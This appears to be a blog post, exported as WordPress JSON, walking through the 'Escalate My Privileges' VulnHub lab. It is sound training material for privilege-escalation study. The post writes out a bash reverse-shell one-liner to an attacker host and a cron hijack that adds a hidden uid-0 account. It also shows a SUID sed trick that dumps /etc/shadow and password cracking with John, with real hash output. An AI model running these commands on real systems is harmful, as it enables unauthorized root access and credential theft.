{"id":26054,"date":"2020-04-22T02:01:07","date_gmt":"2020-04-21T20:31:07","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=26054"},"modified":"2020-05-17T10:19:33","modified_gmt":"2020-05-17T04:49:33","slug":"escalate-my-privileges-vulnhub-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/","title":{"rendered":"Escalate My Privileges Vulnhub Walkthrough"},"content":{"rendered":"

Here’s another article, the Escalate My Privileges Vulnhub Walkthrough<\/a>, on a box designed by Akanksha Sachin Verma<\/a> for learning and sharpening Linux privilege escalation skills. There are several ways of playing with privileges. The goal is to first get a user on the target and then start playing with privileges. This walkthrough is written by Ritik Kumar Jain<\/a>. So let us get started.<\/p>\n


Methodology :<\/h3>\n

Network Scanning<\/h5>\n
    \n
  • Netdiscover<\/li>\n
  • Nmap<\/li>\n<\/ul>\n
    Enumeration<\/h5>\n
      \n
    • Nikto<\/li>\n
    • Netcat payload<\/li>\n<\/ul>\n
      Privilege Escalation<\/h5>\n
        \n
      • sudo-l<\/li>\n
      • crontab<\/li>\n
      • setuid<\/li>\n
      • password cracking<\/li>\n
      • normal guessing<\/li>\n<\/ul>\n

        NETWORK SCANNING:<\/h3>\n

        We start by obtaining the IP address of the machine, for which I used netdiscover. The target’s IP is: 192.168.2.10<\/strong><\/p>\n

        #netdiscover -i vboxnet0\r\nCurrently scanning: 192.168.17.0\/16 | Screen View: Unique Hosts\r\n2 Captured ARP Req\/Rep packets, from 2 hosts. Total size: 102\r\n_____________________________________________________________________________\r\nIP At        MAC Address      Count Len MAC Vendor \/ Hostname\r\n-----------------------------------------------------------------------------\r\n192.168.2.2  08:00:27:df:0c:9c 1     42 PCS Systemtechnik GmbH\r\n192.168.2.10 08:00:27:50:8c:dd 1     60 PCS Systemtechnik GmbH<\/pre>\n

        Next we scan the target with Nmap, using a SYN scan (-sS) across all TCP ports (-p-) with aggressive detection (-A) and OS detection (-O).<\/p>\n

        nmap -A -sS -p- -O 192.168.2.10\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-22 01:37 IST\r\nNmap scan report for 192.168.2.10\r\nHost is up (0.00056s latency).\r\nNot shown: 65526 filtered ports\r\nPORT      STATE  SERVICE VERSION\r\n22\/tcp    open   ssh     OpenSSH 7.4 (protocol 2.0)\r\n| ssh-hostkey: \r\n|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)\r\n|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)\r\n|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)\r\n80\/tcp    open   http    Apache httpd 2.4.6 ((CentOS) PHP\/5.4.16)\r\n| http-methods: \r\n|_  Potentially risky methods: TRACE\r\n| http-robots.txt: 1 disallowed entry \r\n|_\/phpbash.php\r\n|_http-server-header: Apache\/2.4.6 (CentOS) PHP\/5.4.16\r\n|_http-title: Check your Privilege\r\n111\/tcp   open   rpcbind 2-4 (RPC #100000)\r\n| rpcinfo: \r\n|   program version    port\/proto  service\r\n|   100227  3           2049\/tcp   nfs_acl\r\n|   100227  3           2049\/tcp6  nfs_acl\r\n|   100227  3           2049\/udp   nfs_acl\r\n|_  100227  3           2049\/udp6  nfs_acl\r\n875\/tcp   closed unknown\r\n2049\/tcp  open   nfs_acl 3 (RPC #100227)\r\n20048\/tcp open   mountd  1-3 (RPC #100005)\r\n42955\/tcp closed unknown\r\n46666\/tcp closed unknown\r\n54302\/tcp closed unknown\r\nMAC Address: 08:00:27:50:8C:DD (Oracle VirtualBox virtual NIC)\r\nDevice type: general purpose\r\nRunning: Linux 3.X|4.X\r\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\r\nOS details: Linux 3.2 - 4.9\r\n<\/pre>\n

        So far so good. Port 80 is open, so let’s enumerate it further.<\/p>\n

        Enumeration<\/h3>\n

        I opened the target IP address in the browser, and we see an image file.<\/p>\n


        Next I opened \/phpbash.php, which the Nmap output lists as a disallowed entry in robots.txt. Here we see a bash terminal.<\/p>\n


        I ran the id command, and the output shows the apache group name.<\/p>\n


        Without wasting time, I created a one-liner bash reverse shell and started a Netcat listener on port 1505 to catch the shell.<\/p>\n

        bash -i >& \/dev\/tcp\/192.168.2.1\/1505 0>&1 \r\n\r\n#nc -nlvp 1505\r\nlistening on [any] 1505 ...\r\nconnect to [192.168.2.1] from (UNKNOWN) [192.168.2.10] 51562\r\nbash: no job control in this shell\r\nbash-4.2$ id \r\nid \r\nuid=48(apache) gid=48(apache) groups=48(apache)\r\nbash-4.2$ hostname\r\nhostname\r\nmy_privilege\r\nbash-4.2$ uname -a\r\nuname -a\r\nLinux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU\/Linux\r\n<\/pre>\n

        We get a shell.<\/p>\n

        Privilege Escalation<\/h3>\n

        On further enumeration of the home directories, we can see a user armour. In the armour<\/strong> user’s home directory we find a Credentials.txt<\/strong> file. Using the cat command to open the file, we see the message: my password is md5(rootroot1).<\/p>\n

        bash-4.2$ cd \/home\r\nbash-4.2$ ls\r\narmour\r\nbash-4.2$ cd armour\r\nbash-4.2$ ls\r\nCredentials.txt  backup.sh  runme.sh\r\nbash-4.2$ ls -lha\r\ntotal 24K\r\ndrwxrwxrwx  3 armour armour 121 Mar 21 07:59 .\r\ndrwxr-xr-x. 3 root   root    19 Apr 11  2018 ..\r\n-rwxrwxrwx  1 armour armour 123 Mar 19 08:19 .bash_history\r\n-rwxrwxrwx  1 armour armour  27 Mar 17 10:34 .bashrc\r\ndrwxrwxrwx  3 armour armour  18 Mar 17 10:27 .local\r\n-rwxrwxrwx  1 root   armour 603 Mar 17 10:30 .viminfo\r\n-rw-r--r--  1 armour armour  30 Mar 21 07:59 Credentials.txt\r\n-rwxrwxrwx  1 root   root    17 Mar 17 09:48 backup.sh\r\n-rwxrwxrwx  1 root   root     8 Mar 17 10:55 runme.sh\r\nbash-4.2$ cat Credentials.txt \r\nmy password is\r\nmd5(rootroot1) >>> b7bc8489abe360486b4b19dbc242e885\r\nbash-4.2$<\/pre>\n

        So I switch to the armour user with the su (switch user) command, entering the MD5 hash as the password, and the switch succeeds.<\/p>\n

        bash-4.2$ su armour\r\nsu armour\r\nPassword: b7bc8489abe360486b4b19dbc242e885\r\n\r\n[armour@my_privilege html]$ id \r\nid \r\nuid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)\r\n[armour@my_privilege html]$ hostname\r\nhostname\r\nmy_privilege\r\n[armour@my_privilege html]$<\/pre>\n

        Now there are many ways to escalate privileges.<\/p>\n

        METHOD 1: SUDO-L<\/p>\n

        sudo -l prints the commands the current user is allowed to run via sudo. If an attacker can’t directly get root access by any other technique, they might try to compromise a user who has sudo access.<\/p>\n

        [armour@my_privilege html]$ sudo -l\r\nMatching Defaults entries for armour on my_privilege:\r\n    requiretty, !visiblepw, always_set_home, env_reset, env_keep=\"COLORS\r\n    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS\", env_keep+=\"MAIL PS1\r\n    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\", env_keep+=\"LC_COLLATE\r\n    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\", env_keep+=\"LC_MONETARY\r\n    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\", env_keep+=\"LC_TIME LC_ALL\r\n    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\", env_keep+=LD_PRELOAD,\r\n    secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\r\nUser armour may run the following commands on my_privilege:\r\n    (ALL : ALL) NOPASSWD: \/bin\/sh, \/bin\/bash, \/usr\/bin\/sh, \/usr\/bin\/bash,\/bin\/tcsh, \/bin\/csh, \/bin\/ksh, \/bin\/rksh, \/bin\/zsh, \/usr\/bin\/fish,\r\n        \/bin\/dash, \/usr\/bin\/tmux, \/usr\/bin\/rsh, \/bin\/rc, \/usr\/bin\/rc,\/usr\/bin\/rssh, \/usr\/bin\/scponly, \/bin\/scponly, \/usr\/bin\/rootsh,\r\n        \/usr\/bin\/shc, \/usr\/bin\/shtool, \/usr\/bin\/targetcli, \/usr\/bin\/nano,\/usr\/bin\/rnano, \/usr\/bin\/awk, \/usr\/bin\/dgawk, \/usr\/bin\/gawk,\r\n        \/usr\/bin\/igawk, \/usr\/bin\/pgawk, \/usr\/bin\/curl, \/bin\/ed, \/bin\/red,\/usr\/bin\/env, \/usr\/bin\/cat, \/usr\/bin\/chcon, \/usr\/bin\/chgrp,\r\n        \/usr\/bin\/chmod, \/usr\/bin\/chown, \/usr\/bin\/cp, \/usr\/bin\/cut, \/usr\/bin\/dd,\/usr\/bin\/head, \/usr\/bin\/ln, \/usr\/bin\/mv, \/usr\/bin\/nice, \/usr\/bin\/tail,\r\n        \/usr\/bin\/uniq, \/usr\/bin\/ftp, \/usr\/bin\/pftp, \/usr\/bin\/zip,\/usr\/bin\/zipcloak, \/usr\/bin\/zipnote, \/usr\/bin\/zipsplit,\r\n        \/usr\/bin\/funzip, \/usr\/bin\/unzip, \/usr\/bin\/unzipsfx, \/usr\/bin\/zipgrep,\/usr\/bin\/zipinfo, \/usr\/bin\/7za, \/usr\/bin\/socat, \/usr\/bin\/php,\r\n        \/usr\/bin\/git, \/usr\/bin\/rvim, \/usr\/bin\/rvim, \/usr\/bin\/vim,usr\/bin\/vimdiff, \/usr\/bin\/vimtutor, \/usr\/bin\/vi, \/bin\/sed,\r\n        
\/usr\/bin\/qalc, \/usr\/bin\/e3, \/usr\/bin\/dex, \/usr\/bin\/elinks,\/usr\/bin\/scp, \/usr\/bin\/sftp, \/usr\/bin\/ssh, \/usr\/bin\/gtar, \/usr\/bin\/tar,\r\n        \/usr\/bin\/rpm, \/usr\/bin\/up2date, \/usr\/bin\/yum, \/usr\/bin\/expect,\/usr\/bin\/find, \/usr\/bin\/less, \/usr\/bin\/more, \/usr\/bin\/perl,\r\n        \/usr\/bin\/python, \/usr\/bin\/man, \/usr\/bin\/tclsh, \/usr\/bin\/script,\/usr\/bin\/nmap, \/usr\/bin\/nmap, \/usr\/bin\/aria2c, \/usr\/sbin\/arp,\r\n        \/usr\/bin\/base64, \/usr\/bin\/busybox, \/usr\/bin\/cpan, \/usr\/bin\/cpulimit,\/usr\/bin\/crontab, \/usr\/bin\/date, \/usr\/bin\/diff, \/usr\/bin\/dmesg,\r\n        \/usr\/sbin\/dmsetup, \/usr\/bin\/dnf, \/usr\/bin\/docker,\/usr\/bin\/easy_install, \/usr\/bin\/emacs, \/usr\/bin\/expand,\r\n        \/usr\/bin\/facter, \/usr\/bin\/file, \/usr\/bin\/finger, \/usr\/bin\/flock,\/usr\/bin\/fmt, \/usr\/bin\/fold, \/usr\/bin\/gdb, \/usr\/bin\/gimp,\r\n        \/usr\/bin\/grep, \/usr\/bin\/head, \/usr\/sbin\/iftop, \/usr\/bin\/ionice,\/usr\/sbin\/ip, \/usr\/bin\/irb, \/usr\/bin\/jjs, \/usr\/bin\/journalctl,\r\n        \/usr\/bin\/jq, \/usr\/sbin\/ldconfig, \/usr\/sbin\/logsave, \/usr\/bin\/ltrace,\/usr\/bin\/lua, \/usr\/bin\/mail, \/usr\/bin\/make, \/usr\/bin\/mawk,\r\n        \/usr\/bin\/mount, \/usr\/sbin\/mtr, \/usr\/bin\/mysql, \/usr\/bin\/nawk,\/usr\/bin\/ncat, \/usr\/bin\/nl, \/usr\/bin\/node, \/usr\/bin\/od,\r\n        \/usr\/bin\/openssl, \/usr\/bin\/perl, \/usr\/bin\/pic, \/usr\/bin\/pip,\/usr\/bin\/puppet, \/usr\/bin\/readelf, \/usr\/bin\/red, \/usr\/bin\/rlwrap,\r\n        \/usr\/bin\/rpmquery, \/usr\/bin\/rsync, \/usr\/bin\/ruby, \/usr\/bin\/run-parts,\/usr\/bin\/screen, \/usr\/bin\/sed, \/usr\/sbin\/service, \/usr\/bin\/setarch,\r\n        \/usr\/bin\/sftp, \/usr\/bin\/shuf, \/usr\/bin\/smbclient, \/usr\/bin\/socat,\/usr\/bin\/sort, \/usr\/bin\/sqlite3, \/usr\/bin\/stdbuf, \/usr\/bin\/strace,\r\n        \/usr\/bin\/systemctl, \/usr\/bin\/taskset, 
\/usr\/bin\/tclsh,\/usr\/sbin\/tcpdump, \/usr\/bin\/tee, \/usr\/bin\/telnet, \/usr\/bin\/tftp,\r\n        \/usr\/bin\/time, \/usr\/bin\/timeout, \/usr\/bin\/top, \/usr\/bin\/ul,\/usr\/bin\/unexpand, \/usr\/bin\/unshare, \/usr\/bin\/watch, \/usr\/bin\/wget,\r\n        \/usr\/bin\/xargs, \/usr\/bin\/xxd, \/script\/test.sh, \/script\/test.py,\/sbin\/httpd, \/usr\/sbin\/setcap, \/usr\/sbin\/getcap, \/usr\/local\/bin\/ht,\r\n        \/bin\/timedatectl, \/home\/armour\/ai, \/usr\/bin\/user_hello\r\n\r\n[armour@my_privilege html]$ sudo \/bin\/bash\r\nsudo \/bin\/bash\r\n[root@my_privilege html]# id\r\nid\r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n[armour@my_privilege html]$ sudo \/usr\/bin\/user_hello \r\nroot\r\n[armour@my_privilege html]$ vim \/usr\/bin\/user_hello \r\n[armour@my_privilege html]$ cat \/usr\/bin\/user_hello \r\n#!\/bin\/bash\r\nbash -i\r\n[armour@my_privilege html]$ sudo \/usr\/bin\/us\r\nuser_hello   users        usleep       usx2yloader  \r\n[armour@my_privilege html]$ sudo \/usr\/bin\/user_hello \r\n[root@my_privilege html]# id \r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n\r\n<\/pre>\n

        METHOD 2: CRONTAB<\/p>\n

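        Cron jobs generally run with root privileges. If we can successfully tamper with any script or binary defined in a cron job, we can easily execute arbitrary code with root privileges. Here, \/etc\/crontab runs backup.sh as root every minute with \/home\/armour on its PATH, and \/home\/armour\/backup.sh is world-writable.<\/p>\n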

        [armour@my_privilege tmp]$ cat \/etc\/crontab \r\nSHELL=\/bin\/bash\r\nPATH=\/sbin:\/bin:\/usr\/sbin:\/usr\/bin:\/home\/armour\r\n\r\n# For details see man 4 crontabs\r\n\r\n# Example of job definition:\r\n# .---------------- minute (0 - 59)\r\n# |  .------------- hour (0 - 23)\r\n# |  |  .---------- day of month (1 - 31)\r\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\r\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\r\n# |  |  |  |  |\r\n# *  *  *  *  * user-name  command to be executed\r\n  *  *  *  *  * root backup.sh\r\n  *  *  *  *  * root run.sh\r\n  *  *  *  *  * root \/opt\/my_script.sh\r\n  *  *  *  *  * root \/opt\/my_backup.sh\r\n  0  0  1  1  * root \/opt\/new_year.sh\r\n  *  *  *  *  * root \/usr\/bin\/bash \/script\/*.sh\r\n  *  *  *  *  * root \/usr\/bin\/tar czf \/backup\/armour\/`date \"+\\%F-\\%H-\\%M\"`.tar.gz \/home\/armour\/*\r\n[armour@my_privilege tmp]$ cd \r\n[armour@my_privilege ~]$ ls -lh \r\ntotal 12K\r\n-rw-r--r-- 1 armour armour 30 Mar 21 07:59 Credentials.txt\r\n-rwxrwxrwx 1 root   root   63 Apr  3 06:57 backup.sh\r\n-rwxrwxrwx 1 root   root    8 Mar 17 10:55 runme.sh\r\n[armour@my_privilege ~]$ vim backup.sh \r\n[armour@my_privilege ~]$ openssl passwd 123       \r\nlp7umJWRYHRcM\r\n[armour@my_privilege ~]$ vim backup.sh \r\n[armour@my_privilege ~]$ cat backup.sh \r\n#!\/bin\/bash\r\n\/usr\/sbin\/useradd dasagreeva -u 0 -o -p lp7umJWRYHRcM\r\n[armour@my_privilege ~]$ cat \/etc\/passwd\r\nroot:x:0:0:root:\/root:\/bin\/bash\r\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\r\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\r\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\r\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\r\nsync:x:5:0:sync:\/sbin:\/bin\/sync\r\narmour:x:1000:1000::\/home\/armour:\/bin\/bash\r\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\r\nrpcuser:x:29:29:RPC Service User:\/var\/lib\/nfs:\/sbin\/nologin\r\nnfsnobody:x:65534:65534:Anonymous NFS 
User:\/var\/lib\/nfs:\/sbin\/nologin\r\nnginx:x:995:990:Nginx web server:\/opt\/rh\/nginx16\/root\/var\/lib\/nginx:\/sbin\/nologin\r\nmysql:x:994:989:MySQL server:\/var\/lib\/mysql:\/bin\/bash\r\nexim:x:31:31:Exim Daemon:\/dev\/null:\/bin\/false\r\ndasagreeva:x:0:1001::\/home\/dasagreeva:\/bin\/bash\r\n[armour@my_privilege ~]$ su dasagreeva\r\nPassword: \r\n[root@my_privilege armour]# id\r\nuid=0(root) gid=1001(dasagreeva) groups=1001(dasagreeva)\r\n<\/pre>\n

        METHOD 3: Exploiting SUID Executables<\/p>\n

        SUID, which stands for set user ID, is a Linux feature that allows users to execute a file with the permissions of the file’s owner. SUID is a feature that, when used properly, actually enhances Linux security. The problem is that administrators may unknowingly introduce dangerous SUID configurations when they install third-party applications or make logical configuration changes.<\/p>\n

        [armour@my_privilege html]$ find \/ -perm -u=s -type f 2>\/dev\/null \r\n\/var\/www\/html\/awk\r\n\/var\/www\/html\/sed\r\n\/usr\/bin\/sed\r\n\/usr\/bin\/curl\r\n\/usr\/bin\/pic\r\n\/usr\/bin\/chage\r\n\/usr\/bin\/gpasswd\r\n\/usr\/bin\/newgrp\r\n\/usr\/bin\/rpm\r\n\/usr\/bin\/mount\r\n\/usr\/bin\/chfn\r\n\/usr\/bin\/chsh\r\n\/usr\/bin\/su\r\n\/usr\/bin\/umount\r\n\/usr\/bin\/python2.7\r\n\/usr\/bin\/pkexec\r\n\/usr\/bin\/crontab\r\n\/usr\/bin\/passwd\r\n\/usr\/bin\/shc\r\n\/usr\/bin\/shtool\r\n\/usr\/bin\/targetcli\r\n\/usr\/bin\/rlwrap\r\n\/usr\/bin\/scponly\r\n\/usr\/bin\/qalc\r\n\/usr\/bin\/irb\r\n\/usr\/bin\/tclsh8.5\r\n\/usr\/bin\/expect\r\n\/usr\/bin\/zipcloak\r\n\/usr\/bin\/zipnote\r\n\/usr\/bin\/zipsplit\r\n\/usr\/bin\/funzip\r\n\/usr\/bin\/unzipsfx\r\n\/usr\/bin\/zipgrep\r\n\/usr\/bin\/zipinfo\r\n\/usr\/bin\/jq\r\n\/usr\/bin\/ltrace\r\n\/usr\/bin\/mailx\r\n\/usr\/bin\/busybox\r\n\/usr\/bin\/mawk\r\n\/usr\/bin\/cpulimit\r\n\/usr\/bin\/puppet\r\n\/usr\/bin\/smbclient\r\n\/usr\/bin\/strace\r\n\/usr\/bin\/user_hello\r\n\/usr\/bin\/fusermount\r\n\/usr\/sbin\/ldconfig\r\n\/usr\/sbin\/pam_timestamp_check\r\n\/usr\/sbin\/unix_chkpwd\r\n\/usr\/sbin\/arp\r\n\/usr\/sbin\/dmsetup\r\n\/usr\/sbin\/service\r\n\/usr\/sbin\/usernetctl\r\n\/usr\/sbin\/iftop\r\n\/usr\/sbin\/exim-4.84-3\r\n\/usr\/sbin\/mtr\r\n\/usr\/sbin\/ifconfig\r\n\/usr\/sbin\/mount.nfs\r\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\r\n\/usr\/libexec\/git-core\/git-mktag\r\n\/usr\/libexec\/git-core\/git-mktree\r\n\/usr\/libexec\/git-core\/git-mv\r\n\/usr\/libexec\/git-core\/git-name-rev\r\n\/usr\/libexec\/git-core\/git-notes\r\n\/usr\/libexec\/git-core\/git-pack-objects\r\n\/usr\/libexec\/git-core\/git-pack-redundant\r\n\/usr\/libexec\/git-core\/git-pack-refs\r\n\/usr\/libexec\/git-core\/git-replace\r\n\/usr\/libexec\/git-core\/git-patch-id\r\n\/usr\/libexec\/git-core\/git-add\r\n\/usr\/libexec\/git-core\/git-annotate\r\n\/usr\/libexec\/git-core\/git-apply\r\n\/usr\/libexec\/git-core\/git-archive\r
\n\/usr\/libexec\/git-core\/git-bisect--helper\r\n\/usr\/libexec\/git-core\/git-blame\r\n\/usr\/libexec\/git-core\/git-branch\r\n\/usr\/libexec\/git-core\/git-bundle\r\n\/usr\/libexec\/git-core\/git-cat-file\r\n\/usr\/libexec\/git-core\/git-check-attr\r\n\/usr\/libexec\/git-core\/git-check-ignore\r\n\/usr\/libexec\/git-core\/git-check-ref-format\r\n\/usr\/libexec\/git-core\/git-checkout\r\n\/usr\/libexec\/git-core\/git-checkout-index\r\n\r\n[armour@my_privilege html]$ sudo sh -c 'cp $(which sed) .; chmod +s .\/sed'\r\n[armour@my_privilege html]$ .\/sed -e '' \"\/etc\/shadow\"\r\nroot:$6$lYoxb\/H\/0LQ5d50Q$mM2ej4Um6zmkg11uszJrBpZo\/vI4TT6nEvQnlnI\/GlB9otfNIyN9xXfATAxVAUzj4ojTE1pmFbY12NUzw2j\/b0:18313:0:99999:7:::\r\nbin:*:16372:0:99999:7:::\r\ndaemon:*:16372:0:99999:7:::\r\nadm:*:16372:0:99999:7:::\r\nlp:*:16372:0:99999:7:::\r\nsync:*:16372:0:99999:7:::\r\nshutdown:*:16372:0:99999:7:::\r\nhalt:*:16372:0:99999:7:::\r\nmail:*:16372:0:99999:7:::\r\noperator:*:16372:0:99999:7:::\r\ngames:*:16372:0:99999:7:::\r\nftp:*:16372:0:99999:7:::\r\ntcpdump:!!:18319::::::\r\narmour:$6$ibscpEYi$A0bt4lJe4NdD8hqG6KrZs.I7nS6chM1mMP\/6LtG\/DlMQ30W8aQDSr9uM42jI8bGoEZCWUr87aalTQrkioxxQg\/:18340:0:99999:7:::\r\nmysql:!!:18337::::::\r\nexim:!!:18339:0:99999:7:::\r\ndasagreeva:lp7umJWRYHRcM:18355:0:99999:7:::\r\n[armour@my_privilege html]$ \r\n\r\n<\/pre>\n

        We can now see the shadow file of the box.<\/p>\n

        METHOD 4: Password cracking<\/p>\n

        We are going to crack the root user’s password from the shadow file. For that, we need the shadow file<\/strong> and the passwd file<\/strong> in text form.<\/p>\n

        #cd emp\/\r\n#ls\r\npasswd.txt  shadow.txt\r\n#unshadow passwd.txt shadow.txt > password.txt\r\n#john --wordlist=\/usr\/share\/wordlists\/rockyou.txt password.txt\r\nWarning: only loading hashes of type \"sha512crypt\", but also saw type \"descrypt\"\r\nUse the \"--format=descrypt\" option to force loading hashes of that type instead\r\nUsing default input encoding: UTF-8\r\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\r\nCost 1 (iteration count) is 5000 for all loaded hashes\r\nWill run 2 OpenMP threads\r\nPress 'q' or Ctrl-C to abort, almost any other key for status\r\nWarning: Only 3 candidates left, minimum 8 needed for performance.\r\nrootroot1        (root)\r\n1g 0:00:00:00 DONE (2020-04-22 14:15) 25.00g\/s 75.00p\/s 150.0c\/s 150.0C\/s \r\nUse the \"--show\" option to display all of the cracked passwords reliably\r\nSession completed\r\n<\/pre>\n

        METHOD 5: Guessing<\/p>\n

        Last but not least, password guessing is one more way to go.<\/p>\n

        bash-4.2$ su root \r\nsu root \r\nPassword: rootroot1\r\nid \r\nuid=0(root) gid=0(root) groups=0(root)\r\ncd \/root\r\nls \r\nproof.txt\r\ncat proof.txt\r\nBest of Luck\r\n628435356e49f976bab2c04948d22fe4\r\n<\/pre>\n


         <\/p>\n","protected":false},"excerpt":{"rendered":"

        Here’s another article on Escalate My Privileges Vulnhub Walkthrough designed by Akanksha Sachin Verma for learning Linux Privilege Escalation skills….<\/p>\n","protected":false},"author":1,"featured_media":26056,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[]}